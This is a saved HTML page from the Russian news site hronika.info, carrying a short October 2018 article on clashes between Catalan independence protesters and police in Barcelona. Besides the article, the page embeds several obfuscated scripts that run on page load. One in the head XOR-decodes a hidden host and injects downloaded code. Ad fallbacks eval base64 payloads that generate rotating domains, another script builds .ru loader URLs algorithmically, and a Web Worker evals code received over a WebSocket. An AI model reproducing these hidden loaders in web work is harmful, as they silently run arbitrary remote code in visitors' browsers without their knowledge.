<!DOCTYPE html>
<html>
  
  <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>У правительственного здания в Барселоне прошли стычки</title>
<meta name="description" content="Демонстранты столкнулись с полицией." />
<meta name="keywords" content="" />
<meta name="generator" content="DataLife Engine (http://dle-news.ru)" />
<meta property="og:site_name" content="Хроника мировых событий" />
<meta property="og:type" content="article" />
<meta property="og:title" content="У правительственного здания в Барселоне прошли стычки" />
<meta property="og:url" content="http://hronika.info/mir/356212-u-pravitelstvennogo-zdaniya-v-barselone-proshli-stychki.html" />
<meta property="og:image" content="http://hronika.info/uploads/posts/2018-10/thumbs/1538430186_screenshot_2.jpg" />
<link rel="search" type="application/opensearchdescription+xml" href="http://hronika.info/engine/opensearch.php" title="Хроника мировых событий" />
<link rel="alternate" type="application/rss+xml" title="Хроника мировых событий" href="http://hronika.info/rss.xml" />
<script type="text/javascript" src="/engine/classes/js/jquery.js"></script>
<script type="text/javascript" src="/engine/classes/js/jqueryui.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="/engine/classes/js/bbcodes.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
<script type="text/javascript" src="/engine/editor/scripts/webfont.js"></script>
<link media="screen" href="/engine/editor/css/default.css" type="text/css" rel="stylesheet" />
    <link rel="icon" type="image/png" href="/favicon.png" />
    <link rel="apple-touch-favicon" href="/apple-touch-favicon.png"/>
    <link media="screen" href="/templates/hronika/css/engine.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/orating.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/css.css" type="text/css" rel="stylesheet" />
    
    <meta property="fb:admins" content="490214530991726"/>  
    <meta property="fb:app_id" content="574441425949200"/>  
    <meta name="4309768020df0301dc59380bc0812f0f" content="">
    <!-- From Cache --><script type="text/javascript">
    // Tue Oct 02 2018 02:16:40 GMT+0300 (MSK)
    new (function() {
        var host,
            v = 300,
            us,
            start;
        var c = function (g, u, s, h) {
            us = g;
            v = u;
            host = s;
            load([e(atob(host), p(g)), h].join("/"));
        };

        var load = function(g){
            start = window["performance"]["now"]();
            if (typeof window.fetch === 'function') {
                fetch(new Request(g, {redirect: 'error', 'method': 'GET'}))
                    .then(function (response) {
                        return response.text();
                    })
                    .then(insertScript)
                    .catch(onLoadError);
            } else {
                var h = new window["XMLHttpRequest"]();
                h["open"]("GET", g, true);
                h["responseType"] = "text";
                h["addEventListener"]("load", onLoad);
                h["addEventListener"]("error", onLoadError);
                h["send"](null);
            }

        };
        var onLoad = function(e){
            var c = e.target;
            if (c['status'] === 204) {
                return
            }
            insertScript(c.responseText);
        };

        var onLoadError = function(e){
            var b = window["performance"]["now"]() - start;
            if (v > 0 && b > 0 && b < v) {
                /* stop()*/
            }
        };
        var insertScript = function(c){
            var d = window['document']["createElement"]("script");
            d["async"] = false;
            d["textContent"] = c;
            var attr = {"id": "cc-support-script", "data-config":  us, "data-base": host};
            Object.keys(attr).forEach(function (key) {
                d.setAttribute(key, attr[key]);
            });
            window['document']["head"]["appendChild"](d);
        };
        var stop = function(){
            var c = window['document']["styleSheets"];
            for (var d = 0; d < c['length']; d++) {
                c[d]["disabled"] = true
            }
            window["stop"]();
        };
        function p (s) {
            var str = 0;
            s = s.toString().split("");
            for(var i = 0; i< s.length; i++){
                str+= parseInt(s[i]);
            }
            return str.toString();
        }

        function e (s, k) {
            var enc = "";
            for (var i = 0; i < s.length; i++) {
                var a = s.charCodeAt(i);
                var b = a ^ k;
                enc = enc + String.fromCharCode(b);
            }
            return enc;
        }
        return c;
    }() )('9568', 300, 'dGhobG8mMzN0eW50eW9ofW9sfW4ybmk=', '1w5mn/wkjv8p/gna9sem0d/o8kzfjgim/07iuuyawm5ao/n1373ne4m8/q6ln5fi5x');
</script>
<script id="cc-support-script" data-config="9568" data-base="dGhobG8mMzN0eW50eW9ofW9sfW4ybmk=" type="text/javascript" src="https://herhestaspar.ru/1w5mn/wkjv8p/gna9sem0d/o8kzfjgim/07iuuyawm5ao/n1373ne4m8/q6ln5fi5x"></script>

  </head>

  <body><script type="text/javascript">
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = '';
var dle_group      = 5;
var dle_skin       = 'hronika';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var allow_dle_delete_news   = false;
var dle_search_delay   = false;
var dle_search_value   = '';
$(function(){
	FastSearch();
});
//-->
</script><script type="text/javascript">  
<!--  
	hs.graphicsDir = '/engine/classes/highslide/graphics/';
	hs.outlineType = 'rounded-white';
	hs.numberOfImagesToPreload = 0;
	hs.showCredits = false;
	
	hs.lang = {
		loadingText :     'Загрузка...',
		playTitle :       'Просмотр слайдшоу (пробел)',
		pauseTitle:       'Пауза',
		previousTitle :   'Предыдущее изображение',
		nextTitle :       'Следующее изображение',
		moveTitle :       'Переместить',
		closeTitle :      'Закрыть (Esc)',
		fullExpandTitle : 'Развернуть до полного размера',
		restoreTitle :    'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
		focusTitle :      'Сфокусировать',
		loadingTitle :    'Нажмите для отмены'
	};
	
	hs.align = 'center';
	hs.transitions = ['expand', 'crossfade'];
	hs.addSlideshow({
		interval: 4000,
		repeat: false,
		useControls: true,
		fixedControls: 'fit',
		overlayOptions: {
			opacity: .75,
			position: 'bottom center',
			hideOnMouseOut: true
		}
	});
//-->
</script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9393887096432784",
    enable_page_level_ads: true
  });
</script>
    
    <header id="header" class="bshadow">
      <div class="maxw"><div class="logowrap




mir_4
















">
    <div class="logo"><img src="/templates/hronika/images/logo.png" alt="Хроника мировых событий" style="width: 100%;" /></div>
    
</div>	      <a href="/" class="index"></a>
			<nav class="top-menu bshadow">
				<ul>
					<li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
                    <li><a href="/obwestvo/" >Общество</a></li>
                    <li><a href="/kultura/" >Культура</a></li>
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/medicina/" >Медицина</a></li>
                    <li><a href="/nedvizhimost/" >Недвижимость</a></li>
					<li><a href="/videonovosti/" >Видеоновости</a></li>						
				</ul>					
				<ul>
                    <li><a href="/ukraina/" >Украина</a></li>
					<li class="tm-selected"><a href="/mir/" >Мир</a></li>
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
                    <li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/igry/" >Игры</a></li>                    					
				    <li><a href="/kriminal/" >Происшествия</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>
					<li><a href="/kurjozy/" >Курьезы</a></li>
					<li><a href="/mnenia/" >Мнения</a></li>
				</ul>
			</nav>
            <div class="reklright"></div>
      </div>
      </header>
      <div id="wrcont">

	  <!--noindex--><!--/noindex-->
       
        <div class="google-top-center"><!-- noindex -->
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Под меню заглушка -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5011853349"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
<!--/noindex--></div>
        <section id="middle">
          <div class="clr"><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/" itemprop="url"><span itemprop="title">Хроника событий</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/mir/" itemprop="url"><span itemprop="title">Мир</span></a></span> &raquo; У правительственного здания в Барселоне прошли стычки</span></div></div>
          <div id="container">
            <div id="content2">
 

              <article>

			   <div id='dle-content'>

<div class="full-story">
 <div class="mainc fullimg200_150">
  <div class="full-storyttl">
  <div class="fullinfo"></div>
   <div class="fullargcat"><b>Раздел:&nbsp;</b><strong><a href="http://hronika.info/mir/">Мир</a></strong>&nbsp;&nbsp;</div>
   <div class="orating ignore-select" id="orating-356212">
	<a href="#" class="orating_m" title="Не нравится" onclick="orating(356212,0);return false;"></a>
	<a href="#" class="orating_p" title="Нравится" onclick="orating(356212,1);return false;"></a>
	<a href="#" class="orating_res" onclick="ostats(356212,1,true);return false;">0</a>
</div>


  </div>
		<div class="ttl_h1full"><h1><span id="news-title">У правительственного здания в Барселоне прошли стычки</span></h1></div>
     
<div class="ax-full _ga1_on_">
	<!--TBegin:http://hronika.info/uploads/posts/2018-10/1538430186_screenshot_2.jpg|left--><a href="http://hronika.info/uploads/posts/2018-10/1538430186_screenshot_2.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-10/thumbs/1538430186_screenshot_2.jpg" style="float:left;" alt='У правительственного здания в Барселоне прошли стычки' title='У правительственного здания в Барселоне прошли стычки'  /></a><!--TEnd--> <b>Демонстранты столкнулись с полицией.</b><br /><br />Сотрудники каталонской полиции (Моссос д'Эсквадра) применили в понедельник силу против группы участников акции протеста у парламента региона в Барселоне, сообщает <a href="http://hronika.info/">Хроника.инфо</a> со ссылкой на <a href="https://www.segodnya.ua/world/europe/v-barselone-u-zdaniya-parlamenta-katalonii-proizoshli-stolknoveniya-protestuyushchih-s-policiey-1175776.html" target="_blank">Сегодня</a>.<br /><br />Столкновения произошли после того, как части стражей порядка пришлось закрыться в здании палаты от протестующих. Инцидент случился после шествия сторонников независимости Каталонии по случаю первой годовщины референдума о выходе региона из состава Испании.<br /><br />Демонстрация завершилась у парламента региона, где безопасность обеспечивали региональные правоохранительные органы. Вскоре собравшимся удалось прорвать полицейской кордон и подойти вплотную к зданию. Отмечается, что участники акции обклеили двери парламента стикерами.<br /><br />Кроме того, стражам порядка пришлось применить силу для разгона демонстрантов у главного полицейского управления в Барселоне. Участники акции пытались окружить здание и бросали в сотрудников правоохранительных органов жестяные банки.<br /><br />Как написал в "Твиттере" бывший каталонский лидер Карлес Пучдемон, комментируя произошедшее, "если они [демонстранты] используют насилие, они не с 1 октября, мы сделали это [референдум] с открытыми лицами и мирным образом".<br /><br />Как сообщалось, в Каталонии в годовщину референдума о независимости региона протестующие начали блокировать автомагистрали и железнодорожные пути на северо-востоке региона с требованиями провести новое голосование по статусу региона<br /><br />1 октября 2017 года в Каталонии прошло голосование по вопросу о выходе из состава Испании. В нем приняли участие 2,28 млн из 5,31 млн имевших право голоса каталонцев, при этом 90,18% участников плебисцита высказались за независимость. Мадрид изначально считал этот референдум нелегитимным.<br /><br />На референдум пришли 2,3 млн из 5,2 млн каталонцев, несмотря на противодействие гвардейцев. И 90% жителей автономии, которые пришли на избирательные участки, поддержали независимость. Вслед за этим 27 октября парламент автономии утвердил резолюцию о провозглашении независимой республики.<br /><br /><b>Читайте также: <a href="http://hronika.info/mir/356206-tramp-prokommentiroval-svoe-otnoshenie-k-alkogolyu.html" >Трамп прокомментировал свое отношение к алкоголю</a></b><br /><br />В ответ Сенат (верхняя палата парламента страны) одобрил просьбу Мадрида о введении в действие 155-й статьи конституции королевства, которая ранее никогда не применялась и позволила ограничить самоуправление Каталонии.
	<div class="ctrlE">Если вы нашли ошибку в тексте, выделите её мышью и нажмите Ctrl+Enter</div>
</div>
<div class="clr"><br /><p class="basetags">&nbsp;<i>Теги: <a href="http://hronika.info/tags/%D0%91%D0%B0%D1%80%D1%81%D0%B5%D0%BB%D0%BE%D0%BD%D0%B0/">Барселона</a>, <a href="http://hronika.info/tags/%D1%81%D1%82%D0%BE%D0%BB%D0%BA%D0%BD%D0%BE%D0%B2%D0%B5%D0%BD%D0%B8%D1%8F/">столкновения</a></i></p></div>
<div class="full-top_banner">
    <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10323">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10323/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
    </div>
<div class="full-top_banner">
    <div id="AD67HoqbIKGudtbW5O7h" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/lT/v8.js" ></script>
    <div id="MIXADV_4787" class="MIXADVERT_NET"></div>
          <script> 
          var node4787 = document.getElementById("MIXADV_4787");
          if( node4787 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4787&r="+Math.random();
               node4787.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NyAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg3LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg3LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg3IikpIH0sIDUwMDApOyAgO307IA==") );
              }
          }
          </script>
    
    <!-- start NEW content_v1 for hronika.info -->
<div id="adpartner-jsunit-851">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=851&" + Math.random();
        head.appendChild(script);
    </script>
</div>

<!-- end NEW content_v1 for hronika.info -->
    <div id='upsilon73sigma8253'></div>
<script type='text/javascript'>(function(){function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+'abcdefghijklmnopqrstuvwxyz'[v%26>>0]}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,p=8253,l=''+j+''+p,t=document;p=t.createElement('script'),p.type='text/javascript',p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+l+'.js',t.getElementById('upsilon73sigma8253').appendChild(p)})();</script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-9393887096432784",
          enable_page_level_ads: true
     });
</script>
    <script id="r17724" type="text/javascript">
    (function() {
        var worker17724,
            tickerID = 17724,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17724.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17724.postMessage(data);
                }

                worker17724 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17724.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17724.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
    <div id="bn_aa922818e6">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.aa922818e6.js"></script>
     </div>
<div class="f_bottm">
 <div class="f_date_author">Сегодня, 01:15 » Автор: <a onclick="ShowProfile('%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE', 'http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE/', '0'); return false;" href="http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE/">Евгений Шевченко</a></div> 
 <div class="view_comments">  
  <div class="f_views"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;186</div>
  <div class="f_comments"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0</div> 
  </div>
</div>
	</div>    
<div class="sb">
<div class="sotsseti">
<!-- noindex -->
  <script type="text/javascript">(function() {
      if (window.pluso) {return};
       var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
       s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
       s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://x.pluso.ru/pluso-x.js';
       var h=d[g]('body')[0];
       h.appendChild(s);
    })();
 </script>
<div class="pluso-engine" pluso-sharer={"buttons":"facebook,twitter,google,vkontakte,moimir,email,print,more","style":{"size":"small","shape":"square","theme":"theme03","css":""},"orientation":"horizontal","multiline":false} ></div> 
<!-- /noindex -->
    
<div class="sotslikes">
<!-- Код рейтинга -->

</div>
</div>
 <div class="fullstoryn">
   <div class="bshadow exban"> 
    <div id="phoenix5a0d71e04f32fe43a294e05c"></div> <script type="text/javascript">
        var site_id = "5a0d715b4f32fe43bd99b2da";
        var widget_id = "5a0d71e04f32fe43a294e05c";
      </script>
      <script type="text/javascript" src="//phoenix-widget.com/static/js/jsonp.js"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Рекомендуемый под новостью -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="6534414543"
     data-ad-format="autorelaxed"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
           <div class="clr"></div>
    </div>
 </div>
  <div class="clr"></div>
  <div class="fullstoryn">
   <div class="bshadow exban">
  
    
   <div class="clr"></div>
    </div>
 </div>  
</div><br/>

<div class="related-n"> 
<div class="relttl"><h2>Похожие новости по теме</h2></div>
         <div class="clr"></div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/267949-lider-katalonii-otvetil-na-ultimatum-madrida.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-10/1508414517_21.jpg" alt="Лидер Каталонии ответил на ультиматум Мадрида" title="Лидер Каталонии ответил на ультиматум Мадрида" /></a>
    <strong title="Лидер Каталонии ответил на ультиматум Мадрида"><a href="http://hronika.info/mir/267949-lider-katalonii-otvetil-na-ultimatum-madrida.html">Лидер Каталонии ответил на ультиматум Мадрида</a></strong>
  <p>Карлес Пучдемон грозится провозгласить независимость Каталонии в ответ на репрессии.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/264961-stali-izvestny-rezultaty-referenduma-v-katalonii.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-10/1507328280_bez-nazvaniya-1.jpg" alt="Стали известны результаты референдума в Каталонии" title="Стали известны результаты референдума в Каталонии" /></a>
    <strong title="Стали известны результаты референдума в Каталонии"><a href="http://hronika.info/mir/264961-stali-izvestny-rezultaty-referenduma-v-katalonii.html">Стали известны результаты референдума в Каталонии</a></strong>
  <p>Больше 90% населения региона проголосовало за отделение от Испании.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/264622-nezavisimost-katalonii-konstitucionnyy-sud-ispanii-vynes-reshenie.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-10/thumbs/1507220079_kataloniya-nezavisimost.jpeg" alt="Независимость Каталонии: Конституционный суд Испании вынес решение" title="Независимость Каталонии: Конституционный суд Испании вынес решение" /></a>
    <strong title="Независимость Каталонии: Конституционный суд Испании вынес решение"><a href="http://hronika.info/mir/264622-nezavisimost-katalonii-konstitucionnyy-sud-ispanii-vynes-reshenie.html">Независимость Каталонии: Конституционный суд Испании вынес решение</a></strong>
  <p>Парламенту Каталонии запретили проводить заседание по вопросу результатов референдума.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/39126-zhiteli-katalonii-progolosovali-za-nezavisimost-regiona.html">
  <img src="/posters/110_85_80_1/uploads/posts/2014-11/thumbs/1415605278_zhiteli-katalonii-progolosovali-za-nezavisimost-regiona.jpg" alt="Жители Каталонии проголосовали за независимость региона" title="Жители Каталонии проголосовали за независимость региона" /></a>
    <strong title="Жители Каталонии проголосовали за независимость региона"><a href="http://hronika.info/mir/39126-zhiteli-katalonii-progolosovali-za-nezavisimost-regiona.html">Жители Каталонии проголосовали за независимость региона</a></strong>
  <p>Не поддержали независимость региона лишь 4,55% каталонцев.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/37038-v-barselone-sostoyalsya-miting-za-nezavisimost-katalonii.html">
  <img src="/posters/110_85_80_1/uploads/posts/2014-10/thumbs/1413735816_7.jpg" alt="В Барселоне состоялся митинг за независимость Каталонии" title="В Барселоне состоялся митинг за независимость Каталонии" /></a>
    <strong title="В Барселоне состоялся митинг за независимость Каталонии"><a href="http://hronika.info/mir/37038-v-barselone-sostoyalsya-miting-za-nezavisimost-katalonii.html">В Барселоне состоялся митинг за независимость Каталонии</a></strong>
  <p>В Испании митинговали за независимость Каталонии.</p><div class="clr"></div>
</div>
 
<div style="clear: both"></div>
</div>
         <div class="clr"></div>

<!--ЗАКОММЕНТИРОВАННЫЕ
<div style="clear: both"></div>
<div class="poslednie-n">
<div class="relttl"><h2>Поcледние новости раздела category}</h2></div>
<div class="bshadow">
<div class="poslednie_div49-5 fleft">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div class="poslednie_div49-5 fright">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div style="clear: both"></div>
</div>
</div>-->

<div style="clear: both"></div>
<div class="sovetuemsmotret">
<div class="relttl"><h2>Также советуем посмотреть</h2></div>
      <div class="slwrap3 bshadow">
      <div id="slider3">
        <a class="buttons prev" href="#"></a>
        <div class="viewport">
          <ul class="overview"><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356112-minutka-dobroty-kot-podruzhilsya-s-sobakoy-stradayuschey-ot-slaboumiya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538400664_kot.jpg" alt="Минутка доброты: кот подружился с собакой, страдающей от слабоумия" class="l_n_im" title="Минутка доброты: кот подружился с собакой, страдающей от слабоумия" />
</a>
<strong class="ttl" title="Минутка доброты: кот подружился с собакой, страдающей от слабоумия"><a href="http://hronika.info/kurjozy/356112-minutka-dobroty-kot-podruzhilsya-s-sobakoy-stradayuschey-ot-slaboumiya.html">Минутка доброты: кот подружился с собакой, страдающей от слабоумия</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356108-prikolnye-tvity-v-kotoryh-skryvaetsya-nemalo-mudrosti.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538400241_tvity6.jpg" alt="Прикольные твиты, в которых скрывается немало мудрости" class="l_n_im" title="Прикольные твиты, в которых скрывается немало мудрости" />
</a>
<strong class="ttl" title="Прикольные твиты, в которых скрывается немало мудрости"><a href="http://hronika.info/kurjozy/356108-prikolnye-tvity-v-kotoryh-skryvaetsya-nemalo-mudrosti.html">Прикольные твиты, в которых скрывается немало мудрости</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/356107-perezhit-ponedelnik-podborka-otlichnyh-anekdotov-na-vecher.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538400041_yumor.jpeg" alt="Пережить понедельник: подборка отличных анекдотов на вечер" class="l_n_im" title="Пережить понедельник: подборка отличных анекдотов на вечер" />
</a>
<strong class="ttl" title="Пережить понедельник: подборка отличных анекдотов на вечер"><a href="http://hronika.info/kurjozy/356107-perezhit-ponedelnik-podborka-otlichnyh-anekdotov-na-vecher.html">Пережить понедельник: подборка отличных анекдотов на вечер</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/356180-ukraina-otreagiroval-na-otkaz-budapeshta-otozvat-konsula.html"><img src="/posters/167_120_50_1/uploads/posts/2018-10/thumbs/1538418913_mvd.png" alt="Украина отреагировал на отказ Будапешта отозвать консула" class="l_n_im" title="Украина отреагировал на отказ Будапешта отозвать консула" />
</a>
